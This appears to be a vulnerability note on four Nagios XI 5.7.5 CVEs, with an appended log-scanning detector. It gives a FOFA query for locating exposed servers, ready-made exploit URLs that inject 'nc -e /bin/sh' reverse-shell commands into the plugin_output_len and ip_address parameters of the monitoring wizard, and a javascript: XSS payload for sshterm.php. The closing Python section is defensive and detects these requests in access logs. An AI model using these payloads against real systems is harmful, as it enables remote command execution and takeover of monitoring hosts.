    nagios-xi-5.7.5 多个漏洞(CVE-2021-25296~99).md
    2.38 KB / 2021-05-21 09:14:38
    # nagios-xi-5.7.5 multiple vulnerabilities (CVE-2021-25296~99)
    
    FOFA:
    
    ```
    app="Nagios-XI"
    ```
    
    CVE-2021-25296 PoC:
    
    ```
    https://10.0.2.15/nagiosxi/config/monitoringwizard.php?update=1&nsp=50c0f98fe9018dc43c81672ad1aeed5fd3f9710f013381519e553f846b5c2a86&nextstep=3&wizard=windowswmi&check_wmic_plus_ver=1.65&plugin_output_len=&ip_address=127.0.0.1&domain=127.0.0.1&username=asdf&password=asdf&auth_file=&plugin_output_len=1024; nc -e /bin/sh 127.0.0.1 4444;&submitButton2=
    ```
    
    The plugin_output_len variable is not sanitized here, which allows command execution. For example: plugin_output_len=1024; nc -e /bin/sh 127.0.0.1 4444;
    
    CVE-2021-25297
    
    Code location: /usr/local/nagiosxi/html/includes/configwizards/switch/switch.inc.php
    
    PoC (works with admin/non-admin authentication)
    
    ```
    https://10.0.2.15/nagiosxi/config/monitoringwizard.php?update=1&nsp=4e4f78ca5c24c7c526dc86b23092b81c3231a7bf59e1eb67f9918b8daf7b6de9&nextstep=3&wizard=switch&ip_address=127.0.0.1;nc -e /bin/sh 127.0.0.1 4445;&port=161&snmpversion=2c&snmpopts%5Bsnmpcommunity%5D=public&snmpopts%5Bv3_security_level%5D=authPriv&snmpopts%5Bv3_username%5D=&snmpopts%5Bv3_auth_password%5D=&snmpopts%5Bv3_auth_proto%5D=MD5&snmpopts%5Bv3_priv_password%5D=&snmpopts%5Bv3_priv_proto%5D=DES&portnames=number&scaninterfaces=on&bulk_fields%5B%5D=ip_address&bulk_fields%5B%5D=&bulk_fields%5B%5D=&bulk_options=&bulk_fields%5B%5D=&bulk_fields%5B%5D=&warn_speed_in_percent=50&crit_speed_in_percent=80&warn_speed_out_percent=50&crit_speed_out_percent=80&default_port_speed=100&submitButton2=
    ```
    
    The ip_address variable is not sanitized here, which allows command execution. For example: ip_address=1024; nc -e /bin/sh 127.0.0.1 4444;
    
    CVE-2021-25298
    
    Code path: /usr/local/nagiosxi/html/includes/configwizards/cloud-vm/cloud-vm.inc.php
    
    PoC (works with admin/non-admin authentication)
    
    ```
    https://10.0.2.15/nagiosxi/config/monitoringwizard.php?update=1&nsp=e2401df06a3892ba612df20e1ce2f559d7647c4b5fcba7f64c23c0ea9df1564f&nextstep=4&wizard=digitalocean&no_ssl_verify=1&ip_address=127.0.0.1;nc -e /bin/sh 127.0.0.1 4445;&port=5693&token=123&submitButton2=
    ```
    
    The ip_address variable is not sanitized here, which allows command execution. For example: ip_address=1024; nc -e /bin/sh 127.0.0.1 4444;
    
    CVE-2021-25299
    
    Code location: /usr/local/nagiosxi/html/admin/sshterm.php
    
    PoC:
    
    ```
    https://10.0.2.15/nagiosxi/admin/sshterm.php?url=javascript:alert(1)
    ```
    
    Source: https://github.com/fs0c-sh/nagios-xi-5.7.5-bugs
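
An added detection example (not from the original page or the referenced repository): it scans web access-log lines for the four request patterns above by checking that each affected parameter has the shape a legitimate value would have, including when the parameter is repeated as in the first PoC. The allowed shapes, the combined log format and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

HOST = re.compile(r"[A-Za-z0-9.:_-]*")  # assumption: IP address or hostname
DIGITS = re.compile(r"\d*")             # assumption: empty or numeric, as on the page
# wizard value -> (CVE, parameter, allowed shape), taken from the PoC URLs on the page
WIZARD_RULES = {
    "windowswmi": ("CVE-2021-25296", "plugin_output_len", DIGITS),
    "switch": ("CVE-2021-25297", "ip_address", HOST),
    "digitalocean": ("CVE-2021-25298", "ip_address", HOST),
}
REQUEST = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')
P = "/nagiosxi/config/monitoringwizard.php?update=1&nextstep=3&wizard="
# Constructed access-log lines (combined format), not taken from a real server.
SAMPLE_LOG = [
    f'10.0.2.4 - - [21/May/2021:09:00:01 +0000] "GET {P}windowswmi&plugin_output_len=&plugin_output_len=1024%3Bid HTTP/1.1" 200 90',
    f'10.0.2.4 - - [21/May/2021:09:00:02 +0000] "GET {P}switch&ip_address=192.168.1.20&port=161 HTTP/1.1" 200 90',
    f'10.0.2.4 - - [21/May/2021:09:00:03 +0000] "GET {P}digitalocean&ip_address=127.0.0.1%3Bid%3B&port=5693 HTTP/1.1" 200 90',
    '10.0.2.4 - - [21/May/2021:09:00:04 +0000] "GET /nagiosxi/admin/sshterm.php?url=javascript:alert(1) HTTP/1.1" 200 90',
    '10.0.2.4 - - [21/May/2021:09:00:05 +0000] "GET /nagiosxi/admin/sshterm.php?url=https://10.0.2.15/terminal HTTP/1.1" 200 90',
]

def classify(target):
    """Return sorted CVE ids whose request pattern matches one request target."""
    url = urlsplit(target)
    # separator="&" keeps ';' inside the value; every duplicate pair is kept.
    pairs = parse_qsl(url.query, keep_blank_values=True, separator="&")
    hits = set()
    if url.path.endswith("/config/monitoringwizard.php"):
        rule = WIZARD_RULES.get(dict(pairs).get("wizard", ""))
        if rule:
            cve, param, allowed = rule
            if any(k == param and not allowed.fullmatch(v) for k, v in pairs):
                hits.add(cve)
    elif url.path.endswith("/admin/sshterm.php"):
        for k, v in pairs:
            # Browsers ignore control characters and spaces when reading the scheme.
            v = re.sub(r"[\x00-\x20]", "", v)
            if k == "url" and ":" in v and v.split(":", 1)[0].lower() not in ("http", "https"):
                hits.add("CVE-2021-25299")
    return sorted(hits)

def scan(lines):
    """Yield (line_number, cves) for access-log lines that match."""
    for n, line in enumerate(lines, 1):
        m = REQUEST.search(line)
        cves = classify(m.group(1)) if m else []
        if cves:
            yield n, cves
```

Parameters sent in a POST body do not appear in an access log, so this covers only the query-string form shown in the PoCs.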
    